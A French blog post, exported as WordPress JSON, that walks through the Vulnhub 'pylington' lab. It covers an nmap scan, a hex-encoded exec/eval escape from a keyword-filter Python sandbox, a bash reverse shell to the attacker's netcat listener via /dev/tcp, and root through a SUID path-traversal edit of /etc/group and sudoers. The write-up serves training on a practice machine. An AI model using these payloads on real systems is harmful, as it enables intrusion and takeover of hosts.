{"id":377,"date":"2021-06-13T22:26:53","date_gmt":"2021-06-14T03:26:53","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=377"},"modified":"2021-06-13T22:42:00","modified_gmt":"2021-06-14T03:42:00","slug":"resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/","title":{"rendered":"R\u00e9solution du petit puzzle de la machine virtuelle pylington sur vulnhub"},"content":{"rendered":"

On scanne, on obtient<\/p>\n

<\/code> # Nmap 7.91 scan initiated Sun Jun 13 18:46:39 2021 as: nmap -sC -sV -oV 192.168.2.172
\nNmap scan report for 192.168.2.172
\nHost is up (0.0040s latency).
\nNot shown: 998 closed ports
\nPORT STATE SERVICE VERSION
\n22\/tcp open ssh OpenSSH 8.5 (protocol 2.0)
\n| ssh-hostkey:
\n| 3072 bf:ba:23:4e:69:37:69:9f:23:ae:21:35:98:4d:39:fa (RSA)
\n| 256 ed:95:53:52:ef:70:1f:c0:0e:3c:d8:be:35:fc:3a:93 (ECDSA)
\n|_ 256 2d:b8:b0:88:52:83:7b:00:47:31:a4:76:2b:3d:7d:28 (ED25519)
\n80\/tcp open http Apache httpd 2.4.46 ((Unix) mod_wsgi\/4.7.1 Python\/3.9)
\n|_http-generator: Jekyll v4.1.1
\n| http-methods:
\n|_ Potentially risky methods: TRACE
\n| http-robots.txt: 3 disallowed entries
\n|_\/register \/login \/zbir7mn240soxhicso2z
\n|_http-server-header: Apache\/2.4.46 (Unix) mod_wsgi\/4.7.1 Python\/3.9
\n|_http-title: Pylington Cloud | The best way to run Python.<\/p>\n

Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .
\n# Nmap done at Sun Jun 13 18:46:46 2021 — 1 IP address (1 host up) scanned in 6.86 seconds<\/p>\n

<\/code><\/p>\n

On visite 192.168.2.172\/zbir7mn240soxhicso2z<\/p>\n

et obtient
\n

\nUsername: steve\nPassword: bvbkukHAeVxtjjVH\n<\/code><\/pre><\/p>\n
On arrive \u00e0 un utilitaire “magique” pour ex\u00e9cuter du code. Mais celui enl\u00e8ve les fonctions de python open, system et <\/p>\n
\nWelcome to the Super Secret Python IDE. Enter your Python 3 program in the first input box, and your program's standard input in the second input box.\n\nThis online IDE is protected with NoImportOS\u2122, an unescapable\u2122 sandbox. NoImportOS\u2122 is secure because of its simplicity; it's only 9 lines of code (available here)\n\nThis way attackers won't be able to execute anything malicious :-)\n\nPython has some interesting built-in functions ...\n\ndef check_if_safe(code: str) -> bool:\n    if 'import' in code: # import is too dangerous\n        return False\n    elif 'os' in code: # os is too dangerous\n        return False\n    elif 'open' in code: # opening files is also too dangerous\n        return False\n    else:\n        return True\n\n<\/code><\/pre><\/p>\n
\u00e0 la lecture du code, il suffit de faire dispara\u00eetre les mots import, os et open. <\/p>\n
On encode comme ceci, car on ne peut pas simplement encoder “import os”, car ce n’est pas un statement valide pour eval. Il faut donc “exec” la phrase import.
\n
\nexec("import os as gm") #importe le module OS pour l'ex\u00e9cution de la fonction "system" du OS par la suite.\n<\/code><\/pre><\/p>\n
On obtient en allant sur browserling.com\/tools\/utf8-encode
\n
\n\\x65\\x78\\x65\\x63\\x28\\x22\\x69\\x6d\\x70\\x6f\\x72\\x74\\x20\\x6f\\x73\\x20\\x61\\x73\\x20\\x67\\x6d\\x22\\x29\n<\/code><\/pre><\/p>\n
qu’il faut “eval” dans l’application magique<\/p>\n
\neval("\\x65\\x78\\x65\\x63\\x28\\x22\\x69\\x6d\\x70\\x6f\\x72\\x74\\x20\\x6f\\x73\\x20\\x61\\x73\\x20\\x67\\x6d\\x22\\x29")\n<\/code><\/pre><\/p>\n
La commande “os.system” permet d’ex\u00e9cuter un shell et de se connecter sur notre listener netcat. Remarquez que j’ai import\u00e9 le module os comme “gm” pour \u00e9viter d’avoir \u00e0 encoder en utf8 et devoir utiliser eval chaque fois, car “os” n’est pas autoris\u00e9. gm pour Germain Malenfant.<\/p>\n
On pr\u00e9alable sur l’attaquant.
\n
 \nnc -nlvp 2222\n<\/code><\/pre><\/p>\n
Deuxi\u00e8me ligne \u00e0 ajouter dans l’application magique. <\/p>\n
\ngm.system("\/bin\/bash\n -i >& \/dev\/tcp\/192.168.2.119\/2222 0>&1")\n<\/code><\/pre><\/p>\n
Il aurait \u00e9t\u00e9 possible d’encoder en utf8 le code pour envoyer un shell dans le r\u00e9pertoire \/tmp, mais je n’ai pas r\u00e9ussi \u00e0 le faire ex\u00e9cuter par le serveur web. Il faudrait encoder le code
\n
\nopen("\/tmp\/shell.py","w")\n\n<\/code><\/pre>
\net par la suite
\n
\n f=eval("...") .\n f.write(shellcode) # pas besoin d'encoder : le mot write est permis\n<\/code><\/pre><\/p>\n
On obtient le mot de passe facilement dans le home de py. on se loggue avec py et le mot de passe. par la suite, on trouve  secret_stuff et un script avec les droits suid qui peut seulement ajouter une ligne dans un fichier ayant un nom commen\u00e7ant pas “\/srv\/backups” . on s’ajoute dans le groupe root \u00e0 la fin du fichier \/srv\/backups\/..\/..\/etc\/group<\/strong> <\/p>\n
\nroot:x:0:py\n<\/code><\/pre><\/p>\n
on se reconnecte. On peut lire la solution dans le \/root car la solution est lisible en raison des droits d’acc\u00e8s donn\u00e9s au groupe root. <\/p>\n
On s’ajoute dans le sudoers avec le script
\n
\npy ALL=(ALL:ALL) ALL\n<\/code><\/pre><\/p>\n
on devient administrateur
\n
\nsudo su\n<\/su>\n<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"
On scanne, on obtient # Nmap 7.91 scan initiated Sun Jun 13 18:46:39 2021 as: nmap -sC -sV -oV 192.168.2.172 Nmap scan report for 192.168.2.172 Host is up (0.0040s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 8.5 (protocol 2.0) | ssh-hostkey: | 3072 bf:ba:23:4e:69:37:69:9f:23:ae:21:35:98:4d:39:fa (RSA) | 256 ed:95:53:52:ef:70:1f:c0:0e:3c:d8:be:35:fc:3a:93 (ECDSA) |_ 256 2d:b8:b0:88:52:83:7b:00:47:31:a4:76:2b:3d:7d:28 (ED25519) 80\/tcp open http Apache httpd 2.4.46 ((Unix) mod_wsgi\/4.7.1 Python\/3.9) |_http-generator: Jekyll v4.1.1 | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 3 disallowed entries |_\/register \/login \/zbir7mn240soxhicso2z |_http-server-header: Apache\/2.4.46 (Unix) mod_wsgi\/4.7.1 Python\/3.9 |_http-title: Pylington Cloud | The best way to <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"yoast_head":"\nR\u00e9solution du petit puzzle de la machine virtuelle pylington sur vulnhub - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"R\u00e9solution du petit puzzle de la machine virtuelle pylington sur vulnhub - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"On scanne, on obtient # Nmap 7.91 scan initiated Sun Jun 13 18:46:39 2021 as: nmap -sC -sV -oV 192.168.2.172 Nmap scan report for 192.168.2.172 Host is up (0.0040s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 8.5 (protocol 2.0) | ssh-hostkey: | 3072 bf:ba:23:4e:69:37:69:9f:23:ae:21:35:98:4d:39:fa (RSA) | 256 ed:95:53:52:ef:70:1f:c0:0e:3c:d8:be:35:fc:3a:93 (ECDSA) |_ 256 2d:b8:b0:88:52:83:7b:00:47:31:a4:76:2b:3d:7d:28 (ED25519) 80\/tcp open http Apache httpd 2.4.46 ((Unix) mod_wsgi\/4.7.1 Python\/3.9) |_http-generator: Jekyll v4.1.1 | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 3 disallowed entries |_\/register \/login \/zbir7mn240soxhicso2z |_http-server-header: Apache\/2.4.46 (Unix) mod_wsgi\/4.7.1 Python\/3.9 |_http-title: Pylington Cloud | The best way to\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-06-14T03:26:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-06-14T03:42:00+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/\",\"name\":\"R\u00e9solution du petit puzzle de la machine virtuelle pylington sur vulnhub - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-06-14T03:26:53+00:00\",\"dateModified\":\"2021-06-14T03:42:00+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"R\u00e9solution du petit puzzle de la machine virtuelle pylington sur vulnhub\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"R\u00e9solution du petit puzzle de la machine virtuelle pylington sur vulnhub - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/","og_locale":"fr_CA","og_type":"article","og_title":"R\u00e9solution du petit puzzle de la machine virtuelle pylington sur vulnhub - S\u00e9curiser votre site","og_description":"On scanne, on obtient # Nmap 7.91 scan initiated Sun Jun 13 18:46:39 2021 as: nmap -sC -sV -oV 192.168.2.172 Nmap scan report for 192.168.2.172 Host is up (0.0040s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 8.5 (protocol 2.0) | ssh-hostkey: | 3072 bf:ba:23:4e:69:37:69:9f:23:ae:21:35:98:4d:39:fa (RSA) | 256 ed:95:53:52:ef:70:1f:c0:0e:3c:d8:be:35:fc:3a:93 (ECDSA) |_ 256 2d:b8:b0:88:52:83:7b:00:47:31:a4:76:2b:3d:7d:28 (ED25519) 80\/tcp open http Apache httpd 2.4.46 ((Unix) mod_wsgi\/4.7.1 Python\/3.9) |_http-generator: Jekyll v4.1.1 | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 3 disallowed entries |_\/register \/login \/zbir7mn240soxhicso2z |_http-server-header: Apache\/2.4.46 (Unix) mod_wsgi\/4.7.1 Python\/3.9 |_http-title: Pylington Cloud | The best way to","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-06-14T03:26:53+00:00","article_modified_time":"2021-06-14T03:42:00+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/","name":"R\u00e9solution du petit puzzle de la machine virtuelle pylington sur vulnhub - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-06-14T03:26:53+00:00","dateModified":"2021-06-14T03:42:00+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/06\/13\/resolution-du-petit-puzzle-de-la-machine-virtuelle-pylington-sur-vulnhub\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"R\u00e9solution du petit puzzle de la machine virtuelle pylington sur vulnhub"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/377"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=377"}],"version-history":[{"count":13,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/377\/revisions"}],"predecessor-version":[{"id":390,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/377\/revisions\/390"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=377"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=377"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=377"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}